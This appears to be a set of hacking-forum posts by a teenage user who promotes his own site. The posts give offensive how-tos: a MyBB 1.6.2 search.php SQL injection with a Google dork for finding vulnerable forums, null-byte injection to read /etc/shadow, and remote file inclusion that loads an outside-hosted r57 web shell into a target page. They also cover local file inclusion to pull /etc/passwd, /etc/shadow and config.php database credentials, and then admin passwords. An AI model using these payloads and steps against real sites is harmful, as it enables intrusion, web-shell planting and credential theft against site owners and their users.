ShadowNET

Mind PM'ing me the Forum?

Yes, I also discovered it. Worked on most of the forums I found.

--------------------------------------------------------------------------------------------------- # Author: Envy # Website: www.leethackers.org/board/ # Shouts: www.HackHound.org # This is an MyBB 1.6.2 SQL Injection Exploit. The search.php is affected. The SQLi can be performed and the username + password of admins and users stolen. # Google Dork: intext:Powered by MyBB 1.6.2 --------------------------------------------------------------------------------------------------- Proof of Concept: Find a forum that is powered by MyBB 1.6.2 using the dork I provided. On most forums, you will need to register to use the search function. After you are there, enter this in the textbox: ' or ' or 1337' Now hit Enter and you will see an error: You have an error in your SQL Syntax. Now you can perform a SQL Injection Attack. This is nothing for newbies, so please do not ask how to inject it then. MyBB 1.6.1 is vulnerable also! # www.leethackers.org I am Envy, maybe you saw me in the Hacking scene :)

For some reason I cannot edit my post.. well, here is a small update... PHP coders usually use this code: <?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; include( $color . '.php' ); ?> Now, they think they're safe because the file extension must be ".php", WRONG!. All you have to do is put '' on the end of the URL, this will ignore including 'php' or any other file extension. This is called null byte injection. e.g. www.target.com/index.php?page=../../../etc/shadow%00 I am willing to post this image, because I noticed on IPBoard forums it is getting replaced. So just add this: after the URL. Just after /etc/shadow[NULL BYTE INJ HERE]

Ok, thank you for your suggestions!

This is a guide I wrote for my board: www.leethackers.org. What is RFI? RFI or also known as Remote File Inclusion can be used to execute php code from a remote host. This can be really useful. For example: www.target.com/index.php?page=index.txt Here we see, it takes the text of the text file: "index.txt" and places it into index.php. It is the include() PHP Function. Sadly, no-one thought about the security while doing this. As I already said, it gets the text of index.txt and places the code into the index.php. What if we change the index.txt to a Remote server for example: www.t00ls.org/r57.txt <--- This is a web shell. So basically, it should look like this now: www.target.com/index.php?page=www.t00ls.org/r57.txt If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy. What is LFI? LFI or also known as Local File Inclusion can be used to display sensitive information from a specified file on the webhost. The concept is almost the same like RFI. The only thing that is different, the files are on localhost. For example, we have this page: www.target.com/index.php?page=contact.php So it shows the contact.php form. Now let us try this: www.target.com/index.php?page=../../../etc/passwd If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x''s though. Try to check the 'shadow' File. So do this: www.target.com/index.php?page=../../../etc/shadow This file is normally not readable for the users. It is only readable for 'root'. What you could try, is getting the config.php file that is mostly located in the include folder. so: www.target.com/index.php?page=./include/config.php If you have got the details for the DB (server, username, password, database) you can connect to it and get the administrator password from the users or w.e table. Hope this small explaination helped you a bit!

http://www.youtube.com/watch?v=xGgxADmYBz8 Mostly affected Windows Versions are XP SP 1,2 and 3.

We will be using NetCat. You will need a shell on a website. http://www.youtube.com/watch?v=woHQFsGY6Ys

My name is ShadowNET, I am interested in hacking since 12. Now I am 14 and have exploited multiple websites. I actually know what I am doing, not like skids thinking that Keylogging and stealing is hacking. I have my own YouTube Channel running with multiple tutorials: M4x1mFTW and a website, leethackers.org.